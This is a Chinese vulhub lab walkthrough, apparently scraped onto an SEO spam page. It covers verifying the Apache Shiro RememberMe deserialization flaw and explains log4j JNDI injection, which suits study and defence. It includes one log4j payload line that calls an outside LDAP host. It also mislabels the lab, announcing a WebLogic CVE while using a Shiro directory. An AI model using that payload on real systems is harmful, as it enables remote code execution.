当前位置: 首页 > news >正文

版权申请网站正规网站优化哪个公司好

版权申请网站,正规网站优化哪个公司好,傻瓜使用模板建网站,中囯联通腾迅文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic,复现CVE-2018-2894漏洞: cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件: cat docker-compose.yml如图,里面有一个镜像文件的信息和服…

文章目录

  • 安装环境
  • shiro漏洞验证
  • log4j

安装环境

进入vulhb目录下的weblogic,复现CVE-2018-2894漏洞:

cd /vulhub/shiro/CVE-2010-3863

查看docker-compose的配置文件:

cat docker-compose.yml

如图,里面有一个镜像文件的信息和服务名,以及它的端口号(后面要用):

在这里插入图片描述

然后使用下面命令,搭建docker-compose并启动:

sudo docker-compose up -d && sudo docker-compose up -d

如图,安装成功:
在这里插入图片描述

shiro漏洞验证

原理如下

Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

用bp自带的浏览器打开http://10.9.75.45:8080/,随意输入用户名密码并勾选记住我
在这里插入图片描述

点击登录后抓包,发送到repeat模块,发现请求包中有rememberme字段:

在这里插入图片描述

点击send发送,响应包中有set-cookie字段,并有rememberMe=deleteMe内容,这是一个shiro反序列化漏洞的强特征,说明有极大的可能存在shiro反序列化:

在这里插入图片描述

log4j

log4j(log for Java)是Apache的一个开源项目,是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中,未对字符合法性进行严格的限制,执行了JNDI协议加载的远程恶意脚本,从而造成RCE。

它是一个RCE命令执行的漏洞,它的日志的输出如下:print函数双引号中的内容会被当做字符处理

$user=$_GET("user");
log.print(“用户$user登录失败”);

如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容,就会将大括号中的内容当做命令执行

如果流量中遇到下面三个关键字,极大可能是Java的漏洞攻击:

rmi、jndi、ldap

http://www.dinnco.com/news/50889.html

相关文章:

  • 网站的图形拖拽验证码怎么做的建网站找哪个平台好呢
  • 重庆域名注册官网福州百度关键词优化
  • wordpress修改用户资料seo收费标准
  • 海外加速器免费seo网站自动推广
  • 桂林微信网站开发河北seo推广方案
  • 史志网站建设泉州网站关键词排名
  • it运维管理开封seo推广
  • 邢台高端网站建设北京seo培训机构
  • 邢台建设银行网站百度经验悬赏令
  • 鹿城做网站千锋教育北京校区
  • 做it题的网站微信推广方案
  • 网站屏蔽ip地址sem搜索
  • 包头网站优化优化大师电视版
  • 天猫商城入驻seo推广 课程
  • 申请自助建站英国搜索引擎
  • 无法与网站建立安全连接网站推广关键词工具
  • 视频制作软件电脑江门seo外包公司
  • 老域名做网站视频推广方案模板
  • 网站备案流程详解网站建设的重要性
  • 企业型网站制作长春网长春关键词排名站设计
  • 网站的制作过程行业网站有哪些平台
  • 小米路由器3 wordpress优化网站seo方案
  • 深圳手机网站建设安卓优化大师清理
  • 学习做网站教程2022最新新闻素材摘抄
  • 花钱让别人做的网站版权是谁的怎么才能创建一个网站
  • 苹果手机网站大全网址怎么创建
  • 网站制作的付款方式南阳seo优化
  • 网站ip地址查询自己如何做网站
  • 深圳网站模板建站网页设计首页制作
  • 河南智慧团建登录入口谷歌优化师